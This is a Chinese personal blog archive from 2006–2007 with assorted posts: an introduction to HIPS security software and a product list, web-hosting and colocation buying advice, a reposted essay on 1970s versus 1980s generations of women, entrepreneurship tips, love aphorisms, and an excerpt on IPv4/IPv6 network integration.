2007年01月06日

作者:woodenfish          
日期:2007/01/05深夜 (转载请保留此申明)

前言:看到论坛好多新手朋友都在问什么是Hips, 说明了Hips软件的重要性,同时发现网上也没有一篇完整介绍关于Hips的文章,只是整理了此资料,希望大家喜欢,本人刚加入霏凡论坛,希望以后可以和大家交流,学习,祝大家2007年新年快乐!

一、    关于Hips的基本概念.

HIPS:
Host Intrusion Prevent System 主机入侵防御系统。HIPS是一种能监控你电脑中文件的运行和文件运用了其他的文件以及文件对注册表的修改,并向你报告请求允许的的软件。如果你阻止了,那么它将无法运行或者更改。比如你双击了一个病毒程序,HIPS软件跳出来报告而你阻止了,那么病毒还是没有运行的。引用一句话:”病毒天天变种天天出新,使得杀软可能跟不上病毒的脚步,而HIPS能解决这些问题。”。 HIPS是以后系统安全发展的一种趋势,只要你有足够的专业水平,你可以只用HIPS而不需杀毒软件。但是HIPS并不能称为防火墙,最多只能叫做系统防火墙,它不能阻止网络上其他计算机对你计算机的攻击行为。
因为病毒天天变种天天出新,使得杀软可能跟不上病毒的脚步,而HIPS能解决这些问题。

二、HIPS原理以及和杀毒软件、防火墙的区别.

杀毒软件:
计算机病毒指的是一些具有恶意代码可能危害计算机的程序。
杀毒软件基本上应当具有以下两个基本功能:
1:杀毒– 即对带毒文件或病毒本身进行查杀的功能。
2:监控– 一般具有文件监控,网页监控(即监控远程80/8080等常用端口),邮件监控(即监控POP和SMTP端口),等。

能够杀毒防毒的是杀毒软件,不是防火墙。

防火墙:
简单的理解,防火墙是架在两个互相通信主机之间的一个屏障,对非法数据包进行过滤。
我们使用的多数个人防火墙基本具有:防止非法入侵(防止内连) 与 防止本地非法外连 的功能,而SP2系统自带的墙没有后者的功能。
基于这两点,我们可以简单理解防火墙的两个作用:
1:通过阻止非法数据包,防止黑客通过某些手段入侵。
2:防止木马发生外连盗取本地机密信息。个人防火墙没有杀木马的功能,它所做的是在中了木马之后,通过规则禁止其外连以免丢失数据。

现在有不少厂商将自己的杀软和防火墙做成一个网络防护体系,比如:KIS(卡巴) NIS(诺顿) MIS(咖啡)等。。。

HIPS:Host Intrusion Prevent System 主机入侵防御系统
所谓hips(主机入侵防御体系),亦即系统防火墙。它有别于传统意义上的网络防火墙(nips)。二者但主要区别是:传统的nips网络防只有在你使用网络的时候,通过特定的 tcp/ip协议来限定用户访问某一ip地址,或者也可以限制互联网用户访问个人用户和服务器终端;而hips是限制进程调,或者禁止更改或者添加注册表文件。当某进程或者程序试图偷偷运行时,这个行为就会被所hips检测,然后弹出警告,询问用户是否允许运行。一般来说,在用户拥有足够进程相关方面知识的情况下,装上一个hips软件能非常有效的防止木马或者病毒的偷偷运行,以防中毒、插马的可能性。

比如卡巴,咖啡等也具备有一些hips的功能,但功能上比不了专业的hips软件.

二、    HIPS功能的类别

HIPS功能的类别可以分为3D:
1.AD(Application Defend)应用程序防御体系、
2.RD(Registry Defend)注册表防御体系、
3.FD(File Defend)文件防御体系。
它通过可定制的规则对本地的运行程序、注册表的读写操作、以及文件读写操作进行判断并允许或禁止。
目前在有些杀软或防火墙中,也含HIPS功能。

三、    Hips软件的大全
1.Tiny Firewall (网络防火墙),http://www.tinysoftware.com
  功能:AD+RD+FD,
2.Safe’n'Sec (简称SNS或犀牛), http://www.safensoft.com/
  功能:AD+FD+RD,
3.SystemSafeMonitor(简称SSM), http://syssafety.com/
  功能::AD+RD
4.SafeSystem (简称ss) , http://www.gemiscorp.com/english/main.html
  功能:SS(SafeSystem 2006)–FD
5.GhostSecuritySuite(简称GSS),http://www.ghostsecurity.com
  功能:AD+RD
6.ProcessGuard(简称PG), http://www.diamondcs.com.au/processguard/
  功能:AD+RD
7.    Winpooch ,http://sourceforge.net/projects/winpooch
  功能:一条忠实的“看家狗”, 使用api hook技术,可以对几乎所有的可疑操作进行监控、报告或阻止。
8. Parador File Protection PE   http://www.e-securion.com/
  功能:FD
9. EQSecure for System, http://www.eqsecure.com
  功能: AD+FD+RD, 一款国产HIPS软件.
10. ProSecurity,http://www.proactive-hips.com/
  功能:FD+RD,作者是中国人
11. Privacyware Dynamic Security Agent – http://www.privacyware.com
12. ANTIHOOK 澳大利亚的PD,http://www.infoprocess.com.au/AntiHook.php
13. Arovax Shied美国的,http://www.arovaxshield.com/download.php
14. Malware Sweeper Pro,http://www.malwaresweeper.com/
15. Core Force,http://force.coresecurity.com/index.php?module=base&page=download
16 . Watcher,http://www.donationcoders.com/kubicle/watcher/
17. DefenseWall – http://www.softsphere.com/
18. BufferZone SAE/Home/Pro – http://www.trustware.com/
19. GreenBorder – http://greenborder.com/
20. Virtual Sandbox – http://www.fortresgrand.com/products/vsb/vsb.htm
21. VELite – http://www.secureol.com/
22. SandBoxie – http://sandboxie.com/
23. RunSafe – http://www.runsafe.com/
24. 1-Defender – http://amustsoft.com/1-defender/
25. All-Seeing-Eyes – http://www.fortego.com/ase
26. GesWall – http://www.gentlesecurity.com/
27. winpatrol- http://www.winpatrol.com/

参考文献,更详细的资料可以看看这个:
http://wiki.castlecops.com/HIPS_FAQ
http://wiki.castlecops.com/HIPS/IDP_programs/services

以上资料主要来自以下技术论坛的收集和整理,如有问题可联系本人马上做出修改。
最后感谢:霏凡论坛,绅博GDATA AntiVirenKit(中国)论坛,致博论坛, 风云墙论坛,卡饭论坛等

2006年12月27日

在blog配置页面的自定义css格式下加如下代码:
#p498{display:none}

换了不少BLOG

我一直钟情于Donews Blog

MOP收购了Donews后

居然在Donews Blog的首页打起了广告来

感觉真的不爽,最讨厌的还是图片广告

文字广告比如像Gmail邮箱的那种还可以接受啦

天天去keso的BLOG里跑,所以也钟情于国外的google的服务比于中国的baidu

现在MOP这种行为有过之于中国的baidu

真的越来越让人不可接受了吗?

我想作为Donews Blog中的一个fans

相信Donews Blog

相信刘老大

也相信陈老大

希望可以看到普通老百姓的心声

也相信自己,明天是美好的!

2006年12月06日

我来谈谈该如何选择服务器托管及空间商的问题吧,这个我说话还是比较有权威的.经常比较回忆性的去下Chinaz,csdn,金光,K666,龙联等那些都是我最早去的一些站长类网站,所以比较难忘,也是自己本来就单调的网络生活唯一的乐趣了.到了里面看看,下意识的关注了一下服务器租用托管,空间租用等等版块无非都是一些购买空间了,租用服务器了,还有等等各大公司代理商们的广告帖..想起自己以前的角色.
曾经也是里面一个需要购买,到处寻觅的人,到后来成为了一个别人来找我买,自己到处发广告的人.

想想,一晃眼,也几年过去了..
不能说对IDC行业了解的非常透彻吧,至少在国内比我做的早的也能数出来了..
中国比较大的几家网络服务商,也就是新网信海,新网互联,万网,中国频道,商务中国了
稍微次点的也就是中资源,通联无限,E动,等等公司了.有好多都想不起来了..
通联无限在今年初的时候,因为一些不为人知的事情,公司后来解散了,所有客户都转到万网去了.

哎,变化大啊,.

还记得微诺互联以前在网上的知名度和好评度也是非常巨大的,主站日IP曾一度维持在一万IP左右..
只能怪自己,亲手成就了一家很有前景的公司,也亲手毁灭了他..

今天,依然是一个销售人员大发广告,购买人员无头寻觅的日子..

有很多自以为很了解IDC的枪手,也写了很多譬如,任何选择空间了,如何选择服务器托管了,之类的帖子.
很大一部分都被评为精华了,其他的也获得了很多需要购买朋友们的大力支持…
其实不然…
很大一部分,一没参考依据,二没市场调查,有的甚至完全是推广自己…

我也来谈谈吧,但是不是为了推销自己,也不是为了其他什么,完全一个自己经验之谈而已.

首先先说说如何购买空间吧
现在已经跟以前不一样了,到处都可以找到
1G webspace
asp/access/php/mysql
IIS:无限
CPU:无限
强大的管理平台
无限个域名绑定

100元甚至100元内就可买到….

想当年,这样的配置类型的空间,可以卖到至少1K以上…

可能是因为服务器托管价格的降低,还有就是硬件配置的降低的原因..
其实,更多的因素,也只能说是会搞IDC的人越来越多了,已经没多少技术性可言,甚至自己租台服务器
就可以放个WEB,开始做IDC了…

现在的空间租用行业,已经完全混乱了,市场的泛滥,导致价格的降低,带来的只能是用户的痛苦.

试想一下,一台标准配置的虚拟主机服务器的成本
XEON 3.0G *2
1G ECC OR 2GECC
73GSCSI OR 160G SATA
1U OR 2U

这样的硬件配置,应该算是不错的,,也正是那些100元同志们所宣传的自己标准配置..

光是这个硬件成本,配下来,按中关忖最新的价格来算,也至少得8000元RMB了.

现在多半是托管在双线机房,也有些是托管在单线的机房,100元同志们都宣称自己的服务器是百兆独享
那好,按中网科技(CHINANET.CC)所标的100M独享托管价格:1W来算的话,一共是1.8W..
但是,中网科技的100M独享却不是真正的100M,说句实在话,你能跑到15M/SEC,就该庆幸了..
真正的100MBIT端口的价格,电信官方报价在80W左右/年..就算你代理价格,也至少得20W吧?

这个就不说了,你可以有很多理由,说自己的渠道有多好,拿的价格有多低,那么好,我们就按1W来算?

上面所说的,一共是1.8W人民币
100元同志,你要卖180个这样的套餐空间,你才能把自己的成本给赚回来..
这个也不算你自己的基本开销了,也不算你的人员工资了,更不算你的辛苦广告费了..

就这样算吧,你可以不吃不喝,不开人员公司,广告也是自己发的,不需要一分额外的钱出帐.
那么好,你这台服务器确定要放180个站? 180个这样套餐的站点,你是否知道是个什么概念?
按每个站每天的日IP 500来算吧, 其实我是算的很少了,因为你那样的配置,对于现在的站长来说
少少1WIP不是一点问题..
500*180 将近每天有6W个IP… 100元同志,你的IIS是没有限制数量的,
众所周知.,每台服务器极限的IIS量也就4000-6000左右,平分一下,一个站的IIS是多少?200左右..

各位需要购买的朋友们,你觉得200够用吗? 够了就不用说了,不够的呢? 如果这180个网站里面
有一半左右的是比较高级点的站长,那么,你这台服务器就按每天满负载的运行,早晚一天也会瘫痪的..

忘记了,还有你的软体或硬件防火墙的投资了….现在的DDOS SYN UDP CC等攻击是泛滥的,为什么?
技术泛滥了.

我说的这些例子都是最基本的,也是现在网上到处流行的…

试问一下,需要购买的朋友,你敢买这种空间吗? 你的站点,你的技术支持,你的售后服务
能向他们保证的那样承诺给你吗?

还有,不知道什么时候,开始流行了合租空间,..合租空间主要是面对于大点的站长..
5G 的虚拟主机,每年也就200元了….按照上面的比例…需要购买的朋友,你心里有数了么?

现在的中国虚拟主机市场已经泛滥了,如果再这样继续恶意竞争,降低价格甚至不顾及成本.
那么带来的就是中国虚拟主机市场的走向灭亡,和越来越多的人在网上公布一个又一个骗子空间商..

这是我自己之鉴,你可以参考..也可以不用理会..我只能说些我知道的事情而已..

下面是服务器租用,托管方面的..

以前的时候,服务器租用托管等,还都是两大ISP, 电信和网通
主要也都是托管在这两条线上
但是,越来越多的,例如铁通,移动,联通等代理商们也参与了服务器租用托管的大潮流中…

记得今年初的时候,.又流行起来了双线(电信,网通)的服务器托管租用,甚至还有三线,四线的托管…

因为越来越多的站长了解了虚拟主机市场的寒心后,慢慢觉得自己租或托管台服务器又经济,又划算,而且还省心
其实,这个也是的,毕竟什么都是自己的,省得被骗了..

双线,三线,四线等托管商们的出现,也是必然的.因为中国互联网南北不互通的问题,.
导致越来越多的站长们选择了把自己的服务器放在这样的机房内..

单线托管我就不说了,也没什么好谈的,时代快过去了..
我来说下双线,多线的服务器租用托管吧..

先讲一下双线,多线的服务器租用托管的格局.

一、铁通(移动、联通):有很多朋友把服务器托管在铁通(移动、联通)

其实把服务器放在铁通差不多是寻求电信用户和网通用户的折中办法,比如把服务器放在电信,
电信用户打开网站需要1秒,网通用户需要5秒,而现在放在铁通的话,
可能电信和网通用户访问都是3秒,这个其实就牵涉到一般客户愿意容忍的等待时间,
比如一般的人容忍一个网站打开是4秒钟,那放在铁通就是一个很不错的解决方案,
这样电信用户和网通用户都能容忍。但比如要是服务器是用做视频教学类的话,
那这种这种办法就不是很好了,这样会使得电信和网通用户访问速度都慢。
放在铁通,一般价格比较便宜(相对真正的双线路机房来说),
如果朋友们主要是做WEB,会员对速度也不是要求特别高的时候,那你选择铁通是个不错的方案。

二、双线路双IP托管

这种情况又可根据是否拥有2条公网出口进行细分:
1、拥有2条公网出口:这样的双线路双IP托管效果比较好,
不过相对来说托管价格比较高,而且带宽资源也是比较昂贵的,
这种机房资源非常稀缺,目前在全国拥有2个公网出口的双线路机房只有一个,
因为广电总局后面不让电信和网通搞双线路机房,觉得这样对电信和网通的业务打击非常大,
不利于电信和网通的发展,现在唯一拥有公网出口的双线路机房是因为2000年就已经申请好了,不好撤消,
后面申请的都没有批准。
2、没有自己的公网出口:这样的托管商一般是从电信拉条100M独享光纤,
网通拉条100M独享光纤,再分别买一些IP过来,这种现在差不多是市面上见得最多的双线路,
而且一般这样的代理商技术和设备不是很过关,需要通过双网卡设置双IP,
而拥有公网出口的机房,设备和技术力量都还不错,都是通过单网卡绑定双IP的。
其实这种模式还有一个最大的特点就是100M独享光纤其实是和运营商的交换机之间的连接是100M
(也可以理解成是城域网上的100M独),而不是公网出口上的100M独,
估计一般的省会城市100M独享光纤一般在公网出口上能分到20M左右就不错了,
这个要根据该城市的总体带宽资源来看的,要是该城市带宽资源非常宽松,
有可能这种城域网上的100M独享在公网出口上也可以跑很高。
3、拥有一个公网出口:其实这种模式的代理商都没有自己的小机房,
他是通过在电信租柜子做生意,后面再在网通托管一台机器,买一段IP,做代理服务器,
这样做后也可以帮客户在服务器上设置2个IP,但这样通过代理服务器走网通线路解析速度比较慢,
网络访问速度更慢,所以这种效果不是很好,朋友们在选择双线路的时候尽量不要选择这样的双线路托管。

三、双线路单IP托管

1、有公网出口:这样的托管商是本来就有这么好的资源,
比如电信通,他们这个效果比较好,而且是单IP实现,
但这样的资源也是非常稀缺,一般的托管商是没办法搞到这样的资源的
还有就是宇网所在的郑州景安数据中心,利用的是BGP技术来实现的,但是稳定性实在另人失望.

2、没有公网出口:也就是从电信和网通拉光纤出来,后面自己通过设备对路由进行设置,
也是给用户分配一个IP,来实现双线路,不过暂时在市面上还没有看到效果非常好,名气做得不错的,
可能是因为没有公网出口,还有就是设备不够先进等原因吧。

了解了这些知识,我来谈下该如何选择吧

首先说一下双线双IP的托管.
目前凌宇个人认为比较好的有几家
天津IBM双线机房(IBM建的机房,技术和环境设施很好,稳定性也很好,但是却不能放SF,带宽分配的也很少
每台机器限制的带宽是2M上行)
杭州世导机房
其实杭州世导做的就比较早点,据说老板是个老外哈,他们的优点是稳定,技术方面,但是价格贵,带宽更少
据我一台在世导的机器上做的测试,每台服务器的上行和下行的带宽很难突破500K/SEC….

其他的例如还有亿恩科技的江西三线机房(实际只是铁通和电信而已)

还有就是双线单IP了
双线单IP,现在做的可能就只有郑州景安数据中心了,他们的优点是带宽足,价格相对便宜,
但是唯一让人头疼的是他们的服务,还有他们的技术支持…实在另人不敢恭维..

如果是单线托管方面,建议不要选择上海了,
虽然上海的机房环境和各方面都是中国可以说是最好的机房所在地.
但是包括在张江,外高桥,武胜等等大机房都基本饱满了..
上海已经拖了太多的服务器 ,现在在放服务器过去,已经没有太好的带宽给你了..

电信方面,可以选择江苏扬州 苏州 泰洲等,浙江杭州 温州 金华等,河南(222.89段),广东,四川等地区.
网通方面,可以选择浙江网通,深圳网通(带宽少),北京网通(带宽少,价格高),河南网通,山东网通等.

铁通方面,我推荐河南铁通(开封),河北铁通(保定),其他地区也可以参考一下..

联通就免了,他的稳定和互通性实在另人实望,移动还可以,可以选择重庆移动..

北京这个地方,带宽都不太足了,而且普遍价格很高,就是技术好,稳定性不错,防攻击能力也很强
还有一个防攻击能力比较好的机房,基本都在重庆,四川等地,上海那边也不错,但是带款不够
防火墙再好也没用…

打了那么多字,只是希望在寻觅的朋友们,能有个好的选择方案…货比三家,好好选择吧.

凌宇先祝大家能选择另自己满意的IDC…呵呵,闪了..

原创地址:http://www.wretch.cc/blog/ChinaYunet

现在社会发展快,差个两三岁,感觉就不像一代人了。比如我,算是70年代中期出生的人,和生于70年代末的同事比起来,感觉就有不小的差距。

还有个同事叫陶,是个80年代生的小女生。那丫头大学毕业刚来上班的时候,年方23,顶着一头乱蓬蓬、咋乎乎的乱发,我还想,第一天上班怎么就这样呢。

后来才知,那是80年代人的审美,乱发。她们就是要刻意弄成乱发,首如飞蓬。梳得顺顺的,在她们眼里反是不堪,是笑话。

就像她们没有一条有中缝的裤子一样,每一条裤子都是一个又一样的口袋、拉链,还要把皮带露在外面,好像裤子随时都会掉。

和陶说话,她嘴里常吐出一个又一个我听不懂的词,比如“很牛”她会说“很牛叉”,飞吻她会说“打奔儿”,很兴奋她会说“很High”……很多的网络词交杂着英文单词,与我等一贯喜欢“捍卫汉语的纯粹性”的70年代人比起来,自是不同。她的那些新名词,常会影响我们交流的顺畅,总要让我忍不住打断她问她是什么意思。问得多了,就让我感到了自己与“时尚”与“新生事物”的距离,在她面前好像有点小自卑。

陶会拿500块钱去烫个头,会花1000多块钱买一套化妆品,出门喜欢打的,恨不得天天都下馆子,哪怕口袋里只剩下最后100块钱。从不亏待自己。那么舍得爱自己。她是典型的月光族(月底工资就光)。

70年代人呢,很难那么惯自己,宠自己。对自己太好,总会有奢侈感,犯罪感,惶恐感。内心充满犹疑,缺乏行动能力.

心烦时,我会说“烦死了”,她则说“郁闷死了”。

在办公室里说话,我说“去厕所”,她说“我去拉屎”。说出“屎”以及类似“屎”这样的字眼,总会让她心生快意。

我嘴里的骂人话,也不过就是“他妈的!”“真他妈的!”而她一句一口“靠!”,“我靠!”特别是我们私下交谈时,离了这个“靠”,她简直就说不成话,简直就没法畅快地表达。要骂人时,她则好说“我日死你!”或者“日死他!”要是遇上办公室里那个70年代末生的猛女,总会当仁不让地说:你日啊,让你日你也没那零件,你用胡萝卜?

刚开始听时,颇觉不堪。觉得这样的粗话有损内心的美好。70年代人,总是需要维护“感觉”的,哪怕那种感觉是失真的是虚幻的,也宁愿生活在自己的感觉里。听得多了,便也习以为常了。现在,气不顺的时候,我也会在心里暗暗“我靠”一句。

有一次,和陶一起在总编的办公室里说事儿。总编是个年近50,头发梳得贼亮的传统好男人。说至兴处,陶一时忘怀,一个“我靠”冲口而出。总编显然没经过这样的事体,一个年轻鲜亮的小丫在他面前“我靠……”,他仿佛中弹似的彻底愣怔住,不知该怒还是该笑,一时不知如何整理自己的表情。陶也意识到了自己的失口,难以为继,办公室一时无话。呵呵,真是逗死了。

70年代的女人,心里总有些古典情结,追崇些古典美的:记忆中的麻花辫,白底碎花长裙,悠扬舒缓的抒情歌曲,回眸一笑的含情脉脉,眼波流转、欲说还休的心有灵犀……以清纯为美,以和谐为美,以含蓄为美,以羞涩为美,以优雅为美,以忧伤为美。她们的浪漫,是精神的浪漫。难免不淑女。难免不装淑女。

在80年代人那里,这简直是在“装×”(这是陶特爱用的词:装×),是狗屁。要笑场。她们是糙女一代。

70年代人,需要感觉美好,需要想象美好,需要小情小调,有点精神的洁癖。又曾经信奉永恒,信奉真理,信奉感情的忠贞与唯一。

80年代人,崇尚物质,崇尚冷酷,崇尚暴烈,美与粗俗在他们这里没什么界限,粗鄙就是他们的美学。惯于我行我素,从不需要忏悔,“只要我喜欢,没有什么不可以”,抖掉一切精神负担。

且说这个80年代的陶,上班不久就因为寂寞谈起了恋爱。她以前没谈过正经的恋爱。这一恋就昏天暗地。后来她告诉我,两个月时间,她就完成了女人所有的第一次:接吻,上床,同居……

换上个70年代的人,这么短的时间,是会让人觉得英雄气短,好像挺对不起自己的。

而且,她的同居搞得全单位人都知道了,因为她的不设防。换上70年代的,这事怎么着也要藏着掖着的,何况她从来也不想结婚。

陶和我关系不错,她有什么心事都会飞快地来找我说。80年代的孩子,坦率得可爱,百无禁忌,口无遮拦,无耻也那么理由气壮。我在心里常常是佩服的。70年代人如我者,难有那样的勇敢,难以那样的正视自己。

我欣赏那样的真实,虽然我很难对外人抵达那样的真实,总要藏一点盖一点的,总有些事是无法启齿而避而不谈的。70年代人总有对“美好”的焦虑,唯恐自己不美好了。就因为这个“美好”,她们不能正视现实,甚至不能正视自己的内心。

木子美在她的日记里写过,60年代末70年代初的男人,一般都是闷骚型。是滴,70年代人只敢闷骚,80年代人却是要明骚的。明骚得毫不含糊。

和陶说话,有时会让我感觉震撼。有天陶告诉我,她家的狗竟然也会“自慰”,就在前一天晚上,她看见的。还说那会儿她正和一男同学在通电话,她在电话里对着男同学惊呼:“天哪,狗也自慰!我家的狗正在自慰!”听得我大惊,连连问她,你把这个告诉你男同学了??她说是啊。我说你怎么好意思。她说那有什么,我同学也很吃惊狗会自慰呢。让我叹死。

想起我在我情窦初开的年龄,不能容忍男同学在我面前提起“屁股”这样的字眼,不能想象和一个感觉很好的男同学在一起时,有擤鼻涕、放屁这样的事情发生。现在陶告诉我,她和男友在一起时,如果有屁要放,就会故意放得很响,气壮山河。然后两个人狂笑。

又有一次,她皱着眉头告诉我:怎么我现在一见到一个男人,就会想,他性生活时是什么样呢?他性生活时也会这么正经吗?我老忍不住这么想,想着想着就要笑。

那一刻,听她这么说,我真感觉爱死她了。

很多像我之流的女人,也许也会这么想,偶尔也会这么想的,可是谁敢有这样的表达,谁敢于说出这种内心的隐秘呢?

转贴自verycd.bbs

2006年02月17日


1.合作.
不要随便与人合作,与人合作要考虑好利与弊.如果有想法尽快去干,一个人努力的干,卖命的干.干到差不了,有资本了,可以与人短期性的合作.与人合作目标要明确.



2.努力.
工作要努力,随随便便过日子过四五年也是过,稍微努力的过四五年也是过,努力的过四五年也是过,何不努力好好的干.如果努力的过好毕业后的四五年,这对我们以后的人生很有帮助.



3.吃苦耐劳.
不要怕吃苦.在创业阶段,我们要的是名气,是经验,有时候在保本的情况下可以以低价策略来和别人竞争.我们出卖的是点脑力活,力气活,年轻人,睡一觉起来什么都恢复了.



4.目标.
生活要有目标,不仅仅是事业(赚钱)的目标,其他方面也要有目标,如爱情方面的目标,健康方面的目标.家庭方面的目标.各个目标都要重视.只赚了钱,不算人生的成功.



5.虚心学习.
多与比自己大的人(长辈)/成功人事.交流学习,要虚心听取/认真分析他们的意见和建议,一面自己以后走弯路.



6.了解社会.
多了解社会.多实践.多分析某些社会现象的因果厉害关系.认真分析身边发生某些事情. 正视社会的阴暗面.分析社会上某些不良风气,不要清高自傲.也不要随波逐流.某些时候半事情,也需要这方面的帮助.



7.自由.
出来外面做事情,关键是自由,愉快,能学到知识.每走一步都要分析,不要因某一小点利益限制了自己的自由.



8.计划.
给自己定一个五年计划,十年规划.每季度做什么事情,每个月做什么事情.甚至每天做什么事情,有个计划,有个目标比较好.不要每天混混恶恶.几年后你会发现,几年来一直没有目标,什么也没有做成.



9.胆量.
你是工人的子弟,或是农民的儿子.难免思想狭隘.不要盲目.盲从.也不要胆小怕事.多锻炼,大胆去做事情,只要不违法.大胆去做.即使失败了,也为下次积累经验."商场如战场",这句话一点不假.想想,在战场上,不是你死就是我亡.



10. 谋略.
人生活在社会上,就是要用自己的智慧谋略和别人都智斗勇.即使有时你不想和别人斗,别人也要和你争.既然不能退让,何不争一争.古往今来,某些人的 成功,不是电视小说里说的那么偶然的.有其必然性.生活中不玩点小技巧(犯法的不做.害人的不做).哪能那么容易就成功.



11.不要害怕贫穷.
也许你家里没有几十万是百万.大胆的去做事情,不要怕贫穷.即使我们事情做失败了,我们大不了回到起点.还是穷人.



12.学习.
不断充实自己.学习新的知识.多学点技能.为以后作准备.也可作为以后的娱乐消遣.如:驾驶技术,炒菜做饭,毛笔字等.



13.惜时.
如果以上你都做了,我估计你的时间过得很快.我常听某某人说:"这一辈子,就象昨天今天一样.",毛泽东说:"天地转,光阴迫.一万年太久,只争朝夕."."三是八年过去弹指一挥间.",不要因碌碌无为而悔恨!!!

2006年02月16日

个人站越来越多,个人进入互联网创业也越来越多!

随着公司法修订,一个人在2006年也可以成立有限公司,“有你网效应”开全国之先成为2006首家注册资本10万的“一个人有限公司”,这势必会刺激更多的个人进入互联网创业!

那么,在今天,个人应如何投资做站?如何生存?

互联网个人创业,我个人认为应注意3点:

1,老老实实作冷:

热门的主题,门户网站都有,人家要人力有人力,要资金有资金!个人应主动饶开,做冷!

其实有的“冷”,正是“热的开始”,也是真正属于你的机会!全在你用什么眼光去“重诠释”!


2,做草跟,不做傻跟:

草根是最地层的大众,个人站要有敏锐的“草跟意识”!不能追求大而无当的“前卫概念”,个人站不要去傻呼呼的跟着那些“名人名嘴”走,不要“傻跟”!

你要记住,你的资源是一个人,你的员工是大众;将人为管理降低到最小最小;这是你的方向!


3,只做简单商业模式!商业模式越简单易行越好,因为简单,人们容易理解!你的尝试机会就越多,最终你就越实际可行,而不会绕了很远却只有一个机会,那就是还停留在“未来时态”!!!

4,个人做站,最需要的是:简单创意,有效商业!这个注意点应是个人站最需要的!!!

举例说“爱墙”( http://www.lovewall.net/ )!

咋一瞧没什么复杂的,很简单的一个商业创意,但人家愣是能在建站1个月就能实现赢利!

个人站,要的就是:简单有效!

“爱墙”这个站的确很有鲜明的个人特色!而且看起来:

1,只须付出很少的维护;

2,但商业模式有效;

3,这种赢利度,大网站不屑,小网站够口!

但是也有不足。虽然大站不屑,但是那些小站却很感兴趣,还是以“爱墙”为例,几乎在一夜间,冒出了“lovewall.cn”,“lovewall.org”,而且看起来模仿它的也不少!

这个“草跟跟草根”问题是否也应值得人们注意呢?

一个站的商业模式出现后,如果说跟的人很多。严格说,恰恰说明了它的商业价值性!

网站的竞争力取决于商业模式,创始人团队,资金循环,行业生态环境等多种因素!

被跟不是坏事,跟的人越多,越有人气,越成其为“市场”!而“草跟跟草根”则更易使投资者冷静!

从上述方面理解,个人站表面上是“孤身”,其实它的成长是建立在“捆绑用户智慧”基础上的!而这点则不是简单的用“跟”就能解决的!

引自“维博主题投资论坛”

爱由一个笑容开始,用一个吻来成长,用一滴泪来结束
当你爱上一个人而不被对方所爱,是一件很伤害的事。
但最痛苦的莫过你爱一个人而却没有勇气让他知道你的感受。
最好的朋友是那一种能够让你坐在秋千上,不发一言,
然后静静地一起离开,感觉就是从未有过最好的对话。
这是真实的 ~~
你永不知道你得到了什么直至你失去了的时候;
而更加真实的是
你永不会知道自己失去什么直他到达的时候。
要遇上一个人只要用一分钟的时间,
要喜欢上一个人只要一句话的时间;
要爱上一个人只要用一天的时间,
但要忘记一个人却要用一生的时间。
为自己的梦想而去想,
到自己想到的地方,做自己想做的事,
因为你只有一次的人生及一次机会去做这全部的事。
尝试把自己放在对方的立场,当你感觉受到伤害时,
很有可能他也在是被伤害。
最快乐的人并没有需要拥有世上所有最好的事,
而只需要令到大部份的事能沿着自己的人生而来。
人生中一件伤心的事是当你遇见一个对你充满意义的人,
但你却在最后才发现。
一句不小心的说话会令一场骂战展开,
一句残酷的句子会摧毁你一生,
一句话爱的句子却会是无限的喜悦和祝福。
爱由一个笑容开始,用一个吻来成长,用一滴眼泪来结束。
当你出生时你一个人在哭,而所有在旁的在笑,
因此请活出你的生命, 当你死的时候,
围绕你的人在哭而你便是唯一在笑。

记念一下吧

2006年02月05日
  1 引言

  随着对IPv4向IPv6过渡技术研究的不断深入,业界对于过渡问题的认识也不断深入,IETF对于这个问题的认识经历了迁移(Migration)、过渡(Transition)、集成(Integration)、互操作(Interoperation)长期共存(Co-existence)阶段。
从长远来看,IPv4和IPv6技术在网络中将长期共存(Co-existence)。未来的IP网络将是IPv4网络与IPv6网络的集成(Integration)网络。

  2 综合组网的基本原则

  在讨论具体IPv4/v6综合组网技术时,首先需要明确的是综合组网时所应依据的具体原则,这些原则实际上是IPv4/v6综合组网的基本需求,也是讨论和分析IPv4/v6综合组网技术时的重要依据和基础。IPv4/v6综合组网时所需要依据的原则可以分为必需满足的原则和参考原则两种。

  2.1 必需原则

  (1)最大限度地保护既有投资(终端用户,ISP,ICP,电信运营商)

  在进行IPv4/v6综合组网方案的研究时,需要考虑到现有的各个网络运营实体的既有投资,这包括设备投资、市场投资、技术储备、人才储备等多个方面。只有很好地保护既有投资的组网技术和其相应的方案才能具有较好的实用性。

  (2)保证IPv4和IPv6主机之间的互通

  网络中的IPv4主机和IPv6主机必须能够互通,包括路由可达和IP包可达。只有在两者互通的基础上才能谈应用层面的互通。

  (3)保证现有IPv4应用在综合组网环境中的正常应用

  现有IPv4网络中的应用已经支持了大量的用户,IPv6技术在网络中的引入不能对现有的业务造成影响,这种影响包括业务性能的影响、网络可靠性的影响以及网络安全性的影响等多方面。

  (4)避免设备之间的依赖性,设备的更新须具有独立性

  IPv4/v6综合组网技术要求避免设备升级时设备之间的依赖和耦合,网络中的各个部分可以单独选择可用的组网技术,这些技术的选择不能制约其他网络部分组网技术的选择和设备的更新。

  (5)综合组网过程对于网络管理者和终端用户来讲要易于理解和实现

  综合组网过程简单并易于实现是组网成功与否的一个重要因素,过为复杂的组网过程不但增加网络故障发生的机率,而且也影响用户的跟进速度。

  (6)提高组网灵活性,支持网络渐进升级,用户拥有选择何时过渡和如何过渡的权利

  (7)综合组网以后网络的服务质量不应该有明显的降低

  由于IPv6路由器的性能比同级别的IPv4路由器的性能有所下降,双栈路由器的性能也不是很高,因此IPv4/v6综合组网以后,网络的整体性能可能下降,但是这种下降不会对现有业务的服务质量造成明显的影响。

  (8)综合组网以后网络的可靠性和稳定性不能削弱

  (9)综合组网过程中应该考虑如何充分发挥IPv6的技术优势

  IPv6技术的提出主要是为了解决IP地址空间不足的问题,但也增加了一些其他功能,比如网络安全性支持能力等。在综合组网技术研究中应该考虑如何使这些技术优势得以发挥。

  (10)在设计综合组网方案时,一方面要考虑到IPv4/v6长期共存,另一方面也要考虑到将来网络全部采用IPv6的可能。因此,在技术研究时要注意所选技术能够支持网络的平滑过渡,不会形成将来网络过渡的新障碍。

  2.2 参考原则

  (1)在IPv4业务和IPv6业务互不影响的前提下,支持IPv4业务与IPv6业务的互通

在综合组网初期要实现IPv4网元与IPv6网元的互联,可以分别支持IPv4业务和IPv6业务,这些业务可以单独运营,互相不互通,在综合组网的后期要实现IPv4业务与IPv6业务的业务层面的互通。

  (2)应着重考虑从边缘到骨干的逐步演进策略(同时关注从骨干到边缘的策略)

